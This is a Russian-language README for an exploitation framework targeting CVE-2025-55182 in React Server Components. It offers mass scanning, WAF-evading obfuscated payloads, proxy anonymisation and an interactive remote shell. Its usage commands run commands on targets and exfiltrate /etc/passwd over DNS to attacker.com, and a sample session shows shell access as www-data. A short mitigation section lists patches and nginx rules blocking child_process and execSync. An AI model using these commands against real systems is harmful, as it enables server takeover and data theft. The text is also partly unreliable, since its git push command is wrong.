
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — Updated!
Продвинутый сканер RCE для React Server Components, предназначенный для CVE-2025-55182. Возможности: многоэтапное фингерпринтинг, проверка уязвимости, DNS-эксфильтрация, интерактивная оболочка, обфускация полезной нагрузки и профессиональная отчётность (JSON/HTML/PDF). Только авторизованное тестирование.
🔐 ReactRCE-Scanner
CVE-2025-55182 — Продвинутый фреймворк для эксплуатации и оценки RCE в React Server Components
📑 Содержание
⚠️ Правовая оговорка и этическое уведомление
Этот инструмент разработан исключительно в ОБРАЗОВАТЕЛЬНЫХ целях и для АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ. Неавторизованное использование данного программного обеспечения против целей без предварительного письменного согласия является нарушением международных законов о компьютерных преступлениях, включая Computer Fraud and Abuse Act (CFAA), требования GDPR и стандартные условия соглашений об оказании услуг. Автор и участники проекта снимают с себя всякую ответственность за любое неправомерное использование, незаконные операции или косвенный ущерб, возникший в результате работы этой программы. Действуйте строго на свой страх и риск.
📋 Обзор
ReactRCE-Scanner — это фреймворк корпоративного уровня для оценки и проверки безопасности, разработанный специально для CVE-2025-55182 [1] — критической уязвимости удалённого выполнения кода (RCE), затрагивающей React Server Components в версиях от 19.0.0 до 19.2.0.
Фреймворк устраняет разрыв между теоретическими исследованиями уязвимостей и практической проверкой безопасности. Благодаря многоэтапному фингерпринтингу, строгому снижению числа ложных срабатываний, продвинутой обфускации полезной нагрузки и автоматизированной отчётности в нескольких форматах, он предоставляет инженерам по безопасности точные диагностические возможности.
| Использование | Результаты сканирования |
|---|---|
🎯 Ключевые возможности
| Категория возможности | Ключевая реализация | Статус |
|---|---|---|
| Умный фингерпринтинг | Многоисточниковое определение фреймворка и версии с алгоритмами оценки достоверности. | ✅ |
| Многоэтапная проверка | 5-этапный конвейер валидации, предназначенный для систематического исключения ложных срабатываний. | ✅ |
| Генерация полезной нагрузки | Конструктор обфусцированных полезных нагрузок с поддержкой DNS-эксфильтрации и множественных кодировок. | ✅ |
| Интерактивная оболочка | Псевдоинтерактивное выполнение команд в реальном времени и доступ к оболочке на подтверждённых целях. | ✅ |
| Комплексная отчётность | Автоматическая генерация отчётов в форматах JSON, HTML, PDF и Markdown. | ✅ |
| DNS-эксфильтрация | Внеполосная эксфильтрация вывода команд через безопасную обработку DNS-запросов. | ✅ |
| Движок параллелизма | Высокопроизводительная многопоточная архитектура сканирования для больших поверхностей атаки. | ✅ |
| Интеграция с прокси | Поддержка HTTP/HTTPS и SOCKS прокси для анонимизации трафика оценки. | ✅ |
🚀 Краткое руководство по началу работы
Установка
Клонируйте репозиторий и инициализируйте окружение с помощью автоматизированного скрипта установки или ручной установки зависимостей:
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh
# Alternatively, install core Python dependencies manually
pip install -r requirements.txt
Справочник основных команд
Фреймворк работает через модульную CLI-архитектуру, поддерживающую проверку одной цели, массовое сканирование из списков файлов, запуск интерактивной оболочки и формирование отчётов о соответствии.
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan
# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json
# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"
# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell
# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com
# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf
🔬 Архитектура и подробный обзор возможностей
1. Движок умного фингерпринтинга
Фреймворк выполняет глубокую разведку перед доставкой полезной нагрузки. Он анализирует множество полей HTTP-заголовков (X-Powered-By, Next-Action, RSC), структурные мета-теги HTML (data-reactroot, __NEXT_DATA__), статические ресурсы сборки и исходные JavaScript-бандлы [2] [3].
Оценки достоверности разделены на четыре уровня:
-
CRITICAL (95%+): Несколько независимых индикаторов подтверждают уязвимые версии среды выполнения React Server Component.
-
HIGH (75–95%): Обнаружены сильные структурные индикаторы с точным совпадением версии.
-
MEDIUM (50–75%): Присутствуют частичные маркеры фреймворка; требуется ручная проверка.
-
LOW (<50%): Обнаружены слабые эвристики; высокая вероятность ложного срабатывания.
2. Рабочий процесс многоэтапной проверки
Для поддержания целостности операций и предотвращения непреднамеренных нарушений работы сервисов полезные нагрузки проходят строгий конвейер валидации, прежде чем разблокируется какая-либо фаза эксплуатации.
Target URL / Endpoint
│
▼
[Stage 1] Framework & Header Detection
│
▼
[Stage 2] Component Version Analysis
│
▼
[Stage 3] Protocol Compatibility Check
│
▼
[Stage 4] Non-Destructive Safe Validation Request
│
▼
[Stage 5] Statistical Confidence Scoring
│
▼
Vulnerability Assessment Decision
3. Обфускация полезной нагрузки и уклонение
Для тестирования защитных механизмов и Web Application Firewall (WAF) фреймворк включает продвинутый генератор полезных нагрузок с поддержкой:
-
Схемы кодирования: Преобразования Base64, шестнадцатеричные и восьмеричные.
-
Структурная обфускация: Динамическое разбиение строк, внедрение мусорного кода и альтернативное сопоставление метода
require. -
Внеполосная (OOB) эксфильтрация: Безопасное туннелирование данных через DNS-запросы, когда прямые каналы ответа ограничены.
4. Интерактивная командная оболочка
После успешного установления сессии операторы могут вызвать интерактивную оболочку для перечисления после проверки.
$ python exploit.py -t https://target.com -m shell
[*] Initializing interactive shell session against https://target.com
[!] Type 'exit' to terminate the session.
shell> whoami
www-data
shell> uname -a
Linux ip-10-0-1-15 6.8.0-1018-aws #20-Ubuntu SMP PREMO__X64 x86_64 GNU/Linux
shell> exit
[*] Terminating session and cleaning up temporary artifacts...
5. Профессиональный набор отчётности
Отчёты могут генерироваться в нескольких стандартизированных форматах (JSON, HTML, PDF, Markdown), содержащих резюме для руководства, метрики риска, подробные технические выводы, хронологию доказательств и разбивку оценок по CVSS v3.1 [4].
⚙️ Справочник по конфигурации
Расширенные параметры управляются через файл конфигурации config.yaml. Ниже приведён шаблон производственной конфигурации:
# ReactRCE-Scanner Production Configuration
timeout: 30
threads: 20
max_retries: 3
proxy: null
user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
headers:
Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
Accept-Language: "en-US,en;q=0.5"
Accept-Encoding: "gzip, deflate, br"
output:
format: "json"
directory: "./reports"
logging:
level: "INFO"
file: "exploit.log"
exploit:
obfuscate: true
encoding: "base64"
timeout: 60
scanning:
concurrent_scans: 20
rate_limit: 0.5
timeout: 30
fingerprint:
enable_deep_analysis: true
follow_redirects: true
analyze_assets: true
Запускайте сканирование с использованием пользовательского файла конфигурации следующим образом:
python exploit.py -f targets.txt -C config.yaml -o report.json
🧪 Автоматизированный набор тестов
Репозиторий включает комплексный набор модульных и интеграционных тестов для обеспечения стабильности модулей между релизами.
# Execute the complete automated test suite
python exploit.py --test
# Expected Output:
Running test suite...
✓ test_fingerprinting passed
✓ test_payload_generation passed
✓ test_config_loading passed
✓ test_verification passed
✓ test_report_generation passed
Tests passed: 5/5
Для участников, настраивающих локальную среду разработки:
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
pip install -r requirements-dev.txt
# Run pytest unit tests
pytest tests/
# Format and lint codebase
black exploit.py
flake8 exploit.py
🛡️ Устранение и смягчение последствий
Немедленные административные действия
-
Патчинг: Немедленно обновите пакеты React до версии
19.2.1или выше. Обновите экземпляры Next.js до версии15.0.4+[5]. -
Мониторинг: Проверьте журналы доступа HTTP на подозрительные значения заголовка
Next-Actionи невалидированные ссылки на прототипы (__proto__,constructor) [6]. -
Усиление сетевой защиты: Ограничьте исходящие рекурсивные DNS-запросы с серверов приложений для предотвращения эксфильтрации данных.
Примеры правил WAF (Nginx / OpenResty)
# Block prototype pollution and remote execution attempts in request bodies
if ($request_body ~* "__proto__") {
return 403;
}
if ($request_body ~* "constructor") {
return 403;
}
if ($request_body ~* "child_process") {
return 403;
}
if ($request_body ~* "execSync") {
return 403;
}
📚 Ссылки
🤝 Участие и сообщество
Мы приветствуем вклад, запросы на новые функции и сообщения об ошибках. Пожалуйста, следуйте стандартному рабочему процессу fork-and-pull request:
-
Форкните репозиторий (
https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit/fork) -
Создайте ветку для своей функции (
git checkout -b feature/AdvancedScannerModule) -
Зафиксируйте изменения (
git commit -m 'Add advanced scanning heuristic') -
Отправьте изменения в ветку (
git origin push feature/AdvancedScannerModule) -
Откройте Pull Request
📜 Лицензия и автор
Распространяется под лицензией MIT. Подробнее см. LICENSE.
Создано с точностью CerberusMrXi Последнее обновление: август 2026